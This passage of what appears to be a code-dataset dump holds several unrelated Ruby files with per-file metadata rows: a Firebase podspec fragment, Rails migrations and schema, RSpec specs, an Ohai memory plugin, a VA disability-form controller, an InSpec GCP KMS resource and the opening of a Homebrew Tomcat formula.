swift_api.pod_target_xcconfig = {
'SWIFT_OBJC_BRIDGING_HEADER' => '$(PODS_TARGET_SRCROOT)/FirebaseRemoteConfig/Tests/FakeUtils/Bridging-Header.h'
}
swift_api.resources = 'FirebaseRemoteConfig/Tests/SwiftAPI/GoogleService-Info.plist',
'FirebaseRemoteConfig/Tests/SwiftAPI/AccessToken.json'
swift_api.dependency 'OCMock'
end
# Run Swift API tests and tests requiring console changes on a Fake Console.
s.test_spec 'fake-console-tests' do |fake_console|
fake_console.scheme = { :code_coverage => true }
fake_console.platforms = {
:ios => ios_deployment_target,
:osx => osx_deployment_target,
:tvos => tvos_deployment_target
}
fake_console.source_files = 'FirebaseRemoteConfig/Tests/SwiftAPI/*.swift',
'FirebaseRemoteConfig/Tests/FakeUtils/*.[hm]',
'FirebaseRemoteConfig/Tests/FakeUtils/*.swift',
'FirebaseRemoteConfig/Tests/FakeConsole/*.swift'
fake_console.requires_app_host = true
fake_console.pod_target_xcconfig = {
'SWIFT_OBJC_BRIDGING_HEADER' => '$(PODS_TARGET_SRCROOT)/FirebaseRemoteConfig/Tests/FakeUtils/Bridging-Header.h'
}
fake_console.resources = 'FirebaseRemoteConfig/Tests/FakeUtils/GoogleService-Info.plist'
fake_console.dependency 'OCMock'
end
end
| 43.893443 | 117 | 0.689823 |
280e463e7ae84989f247e02ca9cedc080128669d | 656 | require File.join(Rails.root, "app", "data_migrations", "change_suffix_person")
# This rake task is to change the name suffix of a person
# RAILS_ENV=production bundle exec rake migrations:change_suffix_person hbx_ids='19760877 19776645 19747772 19758664 19776417 18941825 19766429 19761376 19753221 19762647 19775694 19757825 19749172 19772583 19771579 19745475 19744827 19761611 19763400 19773230 19743457 2085463 19753992 2166772 19771972 19756452 19771773 19759229 19753432 19760652 18942772 19759405 19771826 19743273'
namespace :migrations do
desc "changing person suffix"
ChangeSuffixPerson.define_task :change_suffix_person => :environment
end | 93.714286 | 386 | 0.844512 |
620da247161a4af823d2842799fe39c2bb4f236e | 134 | class UpdateStoryType < ActiveRecord::Migration[6.1]
def change
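    # update_all issues a single SQL UPDATE and bypasses Active Record validations and callbacks.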
Story.where(type: nil).update_all(type: 'MediaStory')
end
end
| 22.333333 | 57 | 0.738806 |
391873187effb1109fa1fa8aaa78f8c322c25845 | 2,952 | require_relative 'spec_helper'
#noinspection RubyStringKeysInHashInspection
describe Appium::Tutorial do
attr_reader :tutorial_root, :tutorial, :first_module_gen
def expect_gen_exists boolean
exists = exist? first_module_gen
expect(exists).to eq(boolean)
end
def expect_html_exists boolean
exists = exist? join first_module_gen, 'html'
expect(exists).to eq(boolean)
end
def expect_markdown_exists boolean
exists = exist? join first_module_gen, 'appium'
expect(exists).to eq(boolean)
end
def delete_tutorial_path
root = dirname tutorial_root
path = tutorial.tutorial_path
message = "Tutorial path #{path} must include #{root}"
raise message unless path.include? root
rm_rf path if exist? path
expect_tutorial_path_exists false
end
def expect_tutorial_path_exists boolean
exists = exist? tutorial.tutorial_path
expect(exists).to eq(boolean)
end
def delete_gen
tutorial.delete_gen
expect_gen_exists false
end
before do
@tutorial_root = join(Dir.pwd, 'modules')
@tutorial = Appium::Tutorial.new tutorial_root: tutorial_root
@first_module_gen = tutorial.modules.map { |m| m.modules_gen_path }.first
end
it 'detects tutorials with language' do
actual = tutorial.tutorials
expected = [ 'en' ]
expect(actual).to eq(expected)
end
it 'populates a module with correct paths' do
modules = tutorial.modules
module_path = join tutorial_root, 'en'
actual = modules.map { |m| m.module_root }.first
expected = module_path
expect(actual).to eq(expected)
actual = modules.map { |m| m.modules_gen_path }.first
expected = join(module_path, 'gen')
expect(actual).to eq(expected)
actual = modules.map { |m| m.modules_source_path }.first
expected = join(module_path, 'source')
expect(actual).to eq(expected)
end
it 'generates html' do
delete_gen
tutorial.generate_markdown
tutorial.generate_html
expect_gen_exists true
expect_markdown_exists true
expect_html_exists true
end
it 'generates markdown' do
delete_gen
tutorial.generate_markdown
expect_gen_exists true
expect_markdown_exists true
expect_html_exists false
end
it 'deletes the generated folder' do
mkdir_p first_module_gen unless exist? first_module_gen
expect_gen_exists true
tutorial.delete_gen
expect_gen_exists false
end
it 'lists contents' do
list = tutorial.list_contents
expected_modules = 1 * 2 # name/list per module
expect(list.length).to eq(expected_modules)
first_module_name = list.first
expect(first_module_name).to eq(":: /en\n")
first_module_contents = list[1]
expect(first_module_contents.length).to be >= 20
end
it 'publishes to the tutorial path' do
delete_tutorial_path
tutorial.publish
expect_tutorial_path_exists true
delete_tutorial_path
end
end | 24.396694 | 77 | 0.719173 |
262a56bfe5a64c2d4efd51ddb40248186f054e81 | 708 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe Course::LevelNotifier, type: :notifier do
let!(:instance) { Instance.default }
with_tenant(:instance) do
describe '#level_reached' do
let(:course) { create(:course) }
let(:level) { create(:course_level, course: course) }
let(:user) { create(:course_user, course: course).user }
subject { Course::LevelNotifier.level_reached(user, level) }
it 'sends a course notification' do
expect { subject }.to change(course.notifications, :count).by(1)
end
it 'sends a user notification' do
expect { subject }.to change(user.notifications, :count).by(1)
end
end
end
end
| 28.32 | 72 | 0.663842 |
62237a7d5978be7e546830a6f40aa9697c66689c | 1,973 | #
# Author:: Patrick Collins (<[email protected]>)
# Copyright:: Copyright (c) 2013 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
Ohai.plugin(:Memory) do
provides 'memory'
collect_data(:darwin) do
memory Mash.new
installed_memory = shell_out("sysctl -n hw.memsize").stdout.to_i / 1024 / 1024.0
memory[:total] = "#{installed_memory.to_i}MB"
total_consumed = 0
active = 0
inactive = 0
vm_stat = shell_out("vm_stat").stdout
vm_stat_match = /page size of (\d+) bytes/.match(vm_stat)
page_size = if vm_stat_match and vm_stat_match[1]
vm_stat_match[1].to_i
else
4096
end
vm_stat.split("\n").each do |line|
['wired down', 'active', 'inactive'].each do |match|
unless line.index("Pages #{match}:").nil?
pages = line.split.last.to_i
megabyte_val = (pages * page_size) / 1024 / 1024.0
total_consumed += megabyte_val
case match
when 'wired down'
active += megabyte_val.to_i
when 'active'
active += megabyte_val.to_i
when 'inactive'
inactive += megabyte_val.to_i
end
end
end
end
memory[:active] = "#{active}MB" if active > 0
memory[:inactive] = "#{inactive}MB" if inactive > 0
free_memory = installed_memory - total_consumed
memory[:free] = "#{free_memory.to_i}MB" if total_consumed > 0
end
end
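# Illustrative shape of the collected data (numbers invented for the example; the
# active/inactive/free keys are only set when the computed values are positive):
#
#   memory => { "total" => "16384MB", "active" => "9011MB",
#               "inactive" => "2048MB", "free" => "5325MB" }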
| 30.828125 | 84 | 0.651799 |
1aaae40a682766f7a259807d4e45b7853b7922cf | 6,728 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20190509224768) do
create_table "answers", force: :cascade do |t|
t.integer "question_id"
t.text "text"
t.text "short_text"
t.text "help_text"
t.integer "weight"
t.string "response_class"
t.string "reference_identifier"
t.string "data_export_identifier"
t.string "common_namespace"
t.string "common_identifier"
t.integer "display_order"
t.boolean "is_exclusive"
t.integer "display_length"
t.string "custom_class"
t.string "custom_renderer"
t.datetime "created_at"
t.datetime "updated_at"
t.string "default_value"
t.string "api_id"
t.string "display_type"
t.string "input_mask"
t.string "input_mask_placeholder"
end
add_index "answers", ["api_id"], name: "uq_answers_api_id", unique: true
create_table "dependencies", force: :cascade do |t|
t.integer "question_id"
t.integer "question_group_id"
t.string "rule"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "dependency_conditions", force: :cascade do |t|
t.integer "dependency_id"
t.string "rule_key"
t.integer "question_id"
t.string "operator"
t.integer "answer_id"
t.datetime "datetime_value"
t.integer "integer_value"
t.float "float_value"
t.string "unit"
t.text "text_value"
t.string "string_value"
t.string "response_other"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "question_groups", force: :cascade do |t|
t.text "text"
t.text "help_text"
t.string "reference_identifier"
t.string "data_export_identifier"
t.string "common_namespace"
t.string "common_identifier"
t.string "display_type"
t.string "custom_class"
t.string "custom_renderer"
t.datetime "created_at"
t.datetime "updated_at"
t.string "api_id"
end
add_index "question_groups", ["api_id"], name: "uq_question_groups_api_id", unique: true
create_table "questions", force: :cascade do |t|
t.integer "survey_section_id"
t.integer "question_group_id"
t.text "text"
t.text "short_text"
t.text "help_text"
t.string "pick"
t.string "reference_identifier"
t.string "data_export_identifier"
t.string "common_namespace"
t.string "common_identifier"
t.integer "display_order"
t.string "display_type"
t.boolean "is_mandatory"
t.integer "display_width"
t.string "custom_class"
t.string "custom_renderer"
t.datetime "created_at"
t.datetime "updated_at"
t.integer "correct_answer_id"
t.string "api_id"
end
add_index "questions", ["api_id"], name: "uq_questions_api_id", unique: true
create_table "response_sets", force: :cascade do |t|
t.integer "user_id"
t.integer "survey_id"
t.string "access_code"
t.datetime "started_at"
t.datetime "completed_at"
t.datetime "created_at"
t.datetime "updated_at"
t.string "api_id"
end
add_index "response_sets", ["access_code"], name: "response_sets_ac_idx", unique: true
add_index "response_sets", ["api_id"], name: "uq_response_sets_api_id", unique: true
create_table "responses", force: :cascade do |t|
t.integer "response_set_id"
t.integer "question_id"
t.integer "answer_id"
t.datetime "datetime_value"
t.integer "integer_value"
t.float "float_value"
t.string "unit"
t.text "text_value"
t.string "string_value"
t.string "response_other"
t.string "response_group"
t.datetime "created_at"
t.datetime "updated_at"
t.integer "survey_section_id"
t.string "api_id"
end
add_index "responses", ["api_id"], name: "uq_responses_api_id", unique: true
add_index "responses", ["survey_section_id"], name: "index_responses_on_survey_section_id"
create_table "survey_sections", force: :cascade do |t|
t.integer "survey_id"
t.string "title"
t.text "description"
t.string "reference_identifier"
t.string "data_export_identifier"
t.string "common_namespace"
t.string "common_identifier"
t.integer "display_order"
t.string "custom_class"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "survey_translations", force: :cascade do |t|
t.integer "survey_id"
t.string "locale"
t.text "translation"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "surveys", force: :cascade do |t|
t.string "title"
t.text "description"
t.string "access_code"
t.string "reference_identifier"
t.string "data_export_identifier"
t.string "common_namespace"
t.string "common_identifier"
t.datetime "active_at"
t.datetime "inactive_at"
t.string "css_url"
t.string "custom_class"
t.datetime "created_at"
t.datetime "updated_at"
t.integer "display_order"
t.string "api_id"
t.integer "survey_version", default: 0
end
add_index "surveys", ["access_code", "survey_version"], name: "surveys_access_code_version_idx", unique: true
add_index "surveys", ["api_id"], name: "uq_surveys_api_id", unique: true
create_table "validation_conditions", force: :cascade do |t|
t.integer "validation_id"
t.string "rule_key"
t.string "operator"
t.integer "question_id"
t.integer "answer_id"
t.datetime "datetime_value"
t.integer "integer_value"
t.float "float_value"
t.string "unit"
t.text "text_value"
t.string "string_value"
t.string "response_other"
t.string "regexp"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "validations", force: :cascade do |t|
t.integer "answer_id"
t.string "rule"
t.string "message"
t.datetime "created_at"
t.datetime "updated_at"
end
end
| 31.148148 | 111 | 0.676873 |
4ab93975d3d5e85791c39e6e33ac74dbc66c0b53 | 3,743 | # frozen_string_literal: true
module V0
class DisabilityCompensationFormsController < ApplicationController
before_action { authorize :evss, :access? }
before_action :validate_name_part, only: [:suggested_conditions]
def rated_disabilities
response = service.get_rated_disabilities
render json: response,
serializer: RatedDisabilitiesSerializer
end
def suggested_conditions
results = DisabilityContention.suggested(params[:name_part])
render json: results, each_serializer: DisabilityContentionSerializer
end
# Submission path for `form526 increase only`
# TODO: This is getting deprecated in favor of `form526 all claims` (defined below)
# and can eventually be removed completely
def submit
form_content = JSON.parse(request.body.string)
saved_claim = SavedClaim::DisabilityCompensation::Form526IncreaseOnly.from_hash(form_content)
saved_claim.save ? log_success(saved_claim) : log_failure(saved_claim)
submission = create_submission(saved_claim)
jid = submission.start(EVSS::DisabilityCompensationForm::SubmitForm526IncreaseOnly)
render json: { data: { attributes: { job_id: jid } } },
status: :ok
end
def submit_all_claim
form_content = JSON.parse(request.body.string)
saved_claim = SavedClaim::DisabilityCompensation::Form526AllClaim.from_hash(form_content)
saved_claim.save ? log_success(saved_claim) : log_failure(saved_claim)
submission = create_submission(saved_claim)
jid = submission.start(EVSS::DisabilityCompensationForm::SubmitForm526AllClaim)
render json: { data: { attributes: { job_id: jid } } },
status: :ok
end
def submission_status
job_status = Form526JobStatus.where(job_id: params[:job_id]).first
raise Common::Exceptions::RecordNotFound, params[:job_id] unless job_status
render json: job_status, serializer: Form526JobStatusSerializer
end
def rating_info
rating_info_service = EVSS::CommonService.new(auth_headers)
response = rating_info_service.get_rating_info
render json: response,
serializer: RatingInfoSerializer
end
private
def create_submission(saved_claim)
Rails.logger.info(
'Creating 526 submission', user_uuid: @current_user&.uuid, saved_claim_id: saved_claim&.id
)
Form526Submission.create(
user_uuid: @current_user.uuid,
saved_claim_id: saved_claim.id,
auth_headers_json: auth_headers.to_json,
form_json: saved_claim.to_submission_data(@current_user)
)
rescue PG::NotNullViolation => e
Rails.logger.error(
'Creating 526 submission: PG::NotNullViolation', user_uuid: @current_user&.uuid, saved_claim_id: saved_claim&.id
)
raise e
end
def log_failure(claim)
StatsD.increment("#{stats_key}.failure")
raise Common::Exceptions::ValidationErrors, claim
end
def log_success(claim)
StatsD.increment("#{stats_key}.success")
Rails.logger.info "ClaimID=#{claim.confirmation_number} Form=#{claim.class::FORM}"
end
def translate_form4142(form_content)
EVSS::DisabilityCompensationForm::Form4142.new(@current_user, form_content).translate
end
def validate_name_part
raise Common::Exceptions::ParameterMissing, 'name_part' if params[:name_part].blank?
end
def service
EVSS::DisabilityCompensationForm::Service.new(auth_headers)
end
def auth_headers
EVSS::DisabilityCompensationAuthHeaders.new(@current_user).add_headers(EVSS::AuthHeaders.new(@current_user).to_h)
end
def stats_key
'api.disability_compensation'
end
end
end
| 34.33945 | 120 | 0.717606 |
2675f03917bf79932898420f96c0bcb3e3eba372 | 153 | actions :run
default_action :run
attribute :node_ip, :kind_of => String, :name_attribute => true
attribute :port, :kind_of => Integer, :default => 27017 | 30.6 | 63 | 0.738562 |
f8c9900104332ce8f3228c5cbadbc0ee3ed914b3 | 4,071 | # This file was generated by the `rails generate rspec:install` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# The `.rspec` file also contains a few flags that are not defaults but that
# users commonly want.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
=begin
# These two settings work together to allow you to limit a spec run
# to individual examples or groups you care about by tagging them with
# `:focus` metadata. When nothing is tagged with `:focus`, all examples
# get run.
config.filter_run :focus
config.run_all_when_everything_filtered = true
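  #
  # For example, with the filter above enabled, only examples tagged with
  # `:focus` run:
  #
  #   it "registers a new user", :focus do
  #     ...
  #   end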
# Limits the available syntax to the non-monkey patched syntax that is
# recommended. For more details, see:
# - http://myronmars.to/n/dev-blog/2012/06/rspecs-new-expectation-syntax
# - http://teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://myronmars.to/n/dev-blog/2014/05/notable-changes-in-rspec-3#new__config_option_to_disable_rspeccore_monkey_patching
config.disable_monkey_patching!
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = 'doc'
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
=end
end
| 46.261364 | 129 | 0.749693 |
1d50450c26f3928b43f1e914d975588afd37639f | 2,316 | require 'rails_helper'
RSpec.describe CandidateInterface::GcseEnicForm do
describe 'validations' do
let(:form) { subject }
let(:qualification_data) do
{
enic_reference: '12345',
comparable_uk_qualification: 'GCSE (grades A*-C / 9-4)',
}
end
it { is_expected.to validate_presence_of(:have_enic_reference) }
context 'validates enic_reference if they have chosen that they have one' do
before { allow(form).to receive(:chose_to_provide_enic_reference?).and_return(true) }
it { is_expected.to validate_presence_of(:enic_reference) }
end
context 'validates comparable_uk_qualification if they have chosen to provide a ENIC reference' do
before { allow(form).to receive(:chose_to_provide_enic_reference?).and_return(true) }
it { is_expected.to validate_presence_of(:comparable_uk_qualification) }
end
describe '#build_from_qualification' do
it 'creates an object based on the provided ApplicationQualification' do
qualification = ApplicationQualification.new(qualification_data)
enic_form = CandidateInterface::GcseEnicForm.build_from_qualification(
qualification,
)
expect(enic_form.have_enic_reference).to eq 'Yes'
expect(enic_form.enic_reference).to eq qualification.enic_reference
expect(enic_form.comparable_uk_qualification).to eq qualification.comparable_uk_qualification
end
end
describe '#save' do
let(:form_data) do
{
have_enic_reference: 'Yes',
enic_reference: '12345',
comparable_uk_qualification: 'GCSE (grades A*-C / 9-4)',
}
end
it 'returns false if not valid' do
enic_form = CandidateInterface::GcseEnicForm.new
expect(enic_form.save(ApplicationQualification.new)).to eq(false)
end
it 'updates the provided ApplicationQualification if valid' do
qualification = build(:gcse_qualification)
enic_form = CandidateInterface::GcseEnicForm.new(form_data)
expect(enic_form.save(qualification)).to eq(true)
expect(qualification.enic_reference).to eq form_data[:enic_reference]
expect(qualification.comparable_uk_qualification).to eq form_data[:comparable_uk_qualification]
end
end
end
end
| 34.567164 | 103 | 0.708117 |
ace37466bc4a027fb6bf206389c1d3f2ff833cb3 | 9,381 | # encoding: UTF-8
require 'spec_helper'
describe CloudModel::ItemIssue do
it { expect(subject).to have_timestamps }
it { expect(subject).to have_field(:title).of_type String }
it { expect(subject).to have_field(:message).of_type String }
it { expect(subject).to have_field(:key).of_type String }
it { expect(subject).to have_field(:value) }
it { expect(subject).to have_enum(:severity).with_values(
0x00 => :info,
0x01 => :task,
0x10 => :warning,
0xf0 => :critical,
0xff => :fatal
).with_default_value_of(:info) }
it { expect(subject).to have_field(:resolved_at).of_type Time }
it { expect(subject).to belong_to(:subject).with_polymorphism.with_optional }
it { expect(subject).to have_field(:subject_chain_ids).of_type(Array).with_default_value_of [] }
describe '#open' do
it 'should filter for open items' do
scoped = double
filtered = double
expect(subject.class).to receive(:scoped).and_return scoped
expect(scoped).to receive(:where).with(resolved_at: nil).and_return filtered
expect(subject.class.open).to eq filtered
end
end
describe '#resolved' do
it 'should filter for resolved items' do
scoped = double
filtered = double
expect(subject.class).to receive(:scoped).and_return scoped
expect(scoped).to receive(:where).with(resolved_at: {"$ne" => nil}).and_return filtered
expect(subject.class.resolved).to eq filtered
end
end
describe 'name' do
it 'should return title' do
subject.title = "Some Title"
expect(subject.name).to eq "Some Title"
end
end
describe 'resolved?' do
it 'should be true if resolved_at is set' do
subject.resolved_at = Time.now
expect(subject.resolved?).to eq true
end
it 'should be false if resolved_at is not set' do
expect(subject.resolved?).to eq false
end
end
describe 'subject_chain=' do
it 'should set subject_chain_ids' do
guest = Factory :guest
subject.subject_chain=[guest.host, guest]
expect(subject.subject_chain_ids).to eq [
{:id=>guest.host_id, :type=>"CloudModel::Host"},
{:id=>guest.id, :type=>"CloudModel::Guest"}
]
end
end
describe 'subject_chain' do
it 'should get subject_chains from subject_chain_ids' do
guest = Factory :guest
subject.subject_chain_ids=[
{:id=>guest.host_id, :type=>"CloudModel::Host"},
{:id=>guest.id, :type=>"CloudModel::Guest"}
]
expect(subject.subject_chain).to eq [guest.host, guest]
end
end
describe 'set_subject_chain' do
    it "should set subject chain from the item's item_issue_chain" do
item = Factory :guest
subject.subject = item
subject.set_subject_chain
expect(subject.subject_chain).to eq [item.host, item]
end
it 'should set subject chain to the subject in an array if item has no item_issue_chain' do
item = Factory :guest
allow(item).to receive(:'respond_to?').with(:item_issue_chain, false).and_return false
subject.subject = item
subject.set_subject_chain
expect(subject.subject_chain).to eq [item]
end
    it 'should not tamper with the subject chain if no subject was set' do
subject.set_subject_chain
expect(subject.subject_chain_ids).to eq []
end
it 'should be called before save' do
expect(subject).to receive(:set_subject_chain)
subject.run_callbacks :save
end
end
describe 'notify' do
    it 'should invoke configured notifiers' do
notifier = double
allow(CloudModel.config).to receive(:monitoring_notifiers).and_return [{severity: [:info], notifier: notifier}]
subject.title = "Issue Test"
subject.message = "Just an Issue"
expect(notifier).to receive(:send_message).with('[INFO] Issue Test', 'Just an Issue')
subject.notify
end
    it 'should invoke configured notifiers and mention the set subject' do
notifier = double
allow(CloudModel.config).to receive(:monitoring_notifiers).and_return [{severity: [:info], notifier: notifier}]
subject.title = "Issue Test"
subject.message = "Just an Issue on some subject"
allow(subject).to receive(:subject).and_return 'Some::Subject'
expect(notifier).to receive(:send_message).with('[INFO] Some::Subject: Issue Test', 'Just an Issue on some subject')
subject.notify
end
    it 'should include the item issue url in the message if configured' do
notifier = double
allow(CloudModel.config).to receive(:monitoring_notifiers).and_return [{severity: [:info], notifier: notifier}]
allow(CloudModel.config).to receive(:issue_url).and_return 'https://cloud.cloud-model.org/issues/%id%'
subject.title = "Issue Test"
subject.message = "Just an Issue on some subject"
allow(subject).to receive(:subject).and_return 'Some::Subject'
expect(notifier).to receive(:send_message).with('[INFO] Some::Subject: Issue Test', "Just an Issue on some subject\n<https://cloud.cloud-model.org/issues/#{subject.id}>")
subject.notify
end
    it 'should include the subject chain in the message if given' do
notifier = double
guest = Factory :guest
allow(CloudModel.config).to receive(:monitoring_notifiers).and_return [{severity: [:info], notifier: notifier}]
subject.title = "Issue Test"
subject.message = "Just an Issue on some subject"
subject.subject_chain_ids=[
{:id=>guest.host_id, :type=>"CloudModel::Host"},
{:id=>guest.id, :type=>"CloudModel::Guest"}
]
allow(subject).to receive(:subject).and_return 'Some::Subject'
expect(notifier).to receive(:send_message).with('[INFO] Some::Subject: Issue Test', "Hardware Host '#{guest.host.name}', Guest System '#{guest.name}'\n\nJust an Issue on some subject")
subject.notify
end
    it 'should not invoke configured notifiers if severity is not met' do
notifier = double
allow(CloudModel.config).to receive(:monitoring_notifiers).and_return [{severity: [:info], notifier: notifier}]
subject.title = "Issue Test"
subject.severity = :task
expect(notifier).not_to receive(:send_message)
subject.notify
end
    it 'should not invoke configured notifiers if severity is not set on notifier config' do
notifier = double
allow(CloudModel.config).to receive(:monitoring_notifiers).and_return [{notifier: notifier}]
subject.title = "Issue Test"
subject.severity = :task
expect(notifier).not_to receive(:send_message)
subject.notify
end
it 'should be triggered after create' do
expect(subject).to receive(:notify)
subject.run_callbacks :create
end
end
describe 'subject' do
    it 'should find services through its guest' do
services = double
service = double
guest = double CloudModel::Guest, services: services
subject.subject_type = CloudModel::Services::Nginx
subject.subject_id = BSON::ObjectId.new
expect(CloudModel::Guest).to receive(:find_by).with('services'=>{'$elemMatch' =>{'_id'=>subject.subject_id}}).and_return guest
expect(services).to receive(:find).with(subject.subject_id).and_return service
expect(subject.subject).to eq service
end
    it 'should find services through its guest and fall back to nil if not found' do
subject.subject_type = CloudModel::Services::Nginx
subject.subject_id = BSON::ObjectId.new
expect(subject.subject).to eq nil
end
    it 'should find lxd_volumes through its guest' do
volumes = double
volume = double
guest = double CloudModel::Guest, lxd_custom_volumes: volumes
subject.subject_type = CloudModel::LxdCustomVolume
subject.subject_id = BSON::ObjectId.new
expect(CloudModel::Guest).to receive(:find_by).with('lxd_custom_volumes'=>{'$elemMatch' =>{'_id'=>subject.subject_id}}).and_return guest
expect(volumes).to receive(:find).with(subject.subject_id).and_return volume
expect(subject.subject).to eq volume
end
    it 'should find lxd_volumes through its guest and fall back to nil if not found' do
subject.subject_type = CloudModel::LxdCustomVolume
subject.subject_id = BSON::ObjectId.new
expect(subject.subject).to eq nil
end
it 'should use super subject for other items' do
host = CloudModel::Host.new
subject.subject = host
expect(subject.subject).to eq host
end
it 'should be nil if no subject is set' do
expect(subject.subject).to eq nil
end
end
describe 'title' do
it 'should return set title if present' do
subject.title = "Some Title"
expect(subject.title).to eq "Some Title"
end
it 'should use I18n version of title for key if no title is set, but a key' do
subject.key = :something
expect(subject.title).to eq "translation missing: en.issues.something"
end
it 'should use I18n version of title for subject key if no title is set, but a key and subject' do
subject.key = :something
subject.subject = CloudModel::Host.new
expect(subject.title).to eq "translation missing: en.issues.cloud_model/host.something"
end
it 'should be blank if not key or title is set' do
expect(subject.title).to eq nil
end
end
end | 33.503571 | 190 | 0.683296 |
ab9ac5f9669b8138197895d53dec9f9ae983485f | 556 | class UserMailer < ApplicationMailer
# Subject can be set in your I18n file at config/locales/en.yml
# with the following lookup:
#
  #   en.user_mailer.account_activation.subject
#
def account_activation(user)
@user = user
mail to: user.email, subject: "Account activation"
end
# Subject can be set in your I18n file at config/locales/en.yml
# with the following lookup:
#
# en.user_mailer.password_reset.subject
#
def password_reset(user)
@user = user
mail to: user.email, subject: "Password Reset"
end
end
| 24.173913 | 65 | 0.703237 |
5d4a6062e66ae41e8312e629cafc897e5acda44c | 2,339 | # frozen_string_literal: false
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file in README.md and
# CONTRIBUTING.md located at the root of this package.
#
# ----------------------------------------------------------------------------
require 'gcp_backend'
require 'google/kms/property/cryptokey_version_template'
# A provider to manage Cloud Key Management Service resources.
class KMSCryptoKey < GcpResourceBase
name 'google_kms_crypto_key'
desc 'CryptoKey'
supports platform: 'gcp'
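  # Usage sketch in an InSpec control; parameter names follow the
  # resource_base_url template below:
  #
  #   describe google_kms_crypto_key(project: 'my-project', location: 'us-east1',
  #                                  key_ring_name: 'my-ring', name: 'my-key') do
  #     it { should exist }
  #     its('purpose') { should cmp 'ENCRYPT_DECRYPT' }
  #   end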
attr_reader :params
attr_reader :crypto_key_name
attr_reader :create_time
attr_reader :labels
attr_reader :purpose
attr_reader :rotation_period
attr_reader :version_template
attr_reader :next_rotation_time
attr_reader :key_ring
def initialize(params)
super(params.merge({ use_http_transport: true }))
@params = params
@fetched = @connection.fetch(product_url(params[:beta]), resource_base_url, params, 'Get')
parse unless @fetched.nil?
end
def parse
@crypto_key_name = name_from_self_link(@fetched['name'])
@create_time = parse_time_string(@fetched['createTime'])
@labels = @fetched['labels']
@purpose = @fetched['purpose']
@rotation_period = @fetched['rotationPeriod']
@version_template = GoogleInSpec::KMS::Property::CryptoKeyVersionTemplate.new(@fetched['versionTemplate'], to_s)
@next_rotation_time = parse_time_string(@fetched['nextRotationTime'])
@key_ring = @fetched['keyRing']
end
# Handles parsing RFC3339 time string
def parse_time_string(time_string)
time_string ? Time.parse(time_string) : nil
end
def exists?
[email protected]?
end
def to_s
"CryptoKey #{@params[:name]}"
end
def primary_state
@fetched['primary']['state']
end
private
def product_url(_ = nil)
'https://cloudkms.googleapis.com/v1/'
end
def resource_base_url
'projects/{{project}}/locations/{{location}}/keyRings/{{key_ring_name}}/cryptoKeys/{{name}}'
end
end
| 29.2375 | 116 | 0.64643 |
2660d281fcf83eb169afd979550cba36c780bd91 | 218 | str = "Now I need a drink, alcoholic of course, after the heavy lectures involving quantum mechanics."
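# The word lengths below spell out successive digits of pi (3.14159265358979),
# a classic mnemonic; the loop prints one digit (word length) per line.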
split_str = str.split(/\s|,\s*|;\s*|\.\s*/)
split_str.each do |word|
# puts word
puts word.size
end
| 21.8 | 102 | 0.674312 |
4a8a74904d23a5aa198871e5aa40535e8007ab65 | 2,124 | class Tomcat < Formula
desc "Implementation of Java Servlet and JavaServer Pages"
homepage "https://tomcat.apache.org/"
stable do
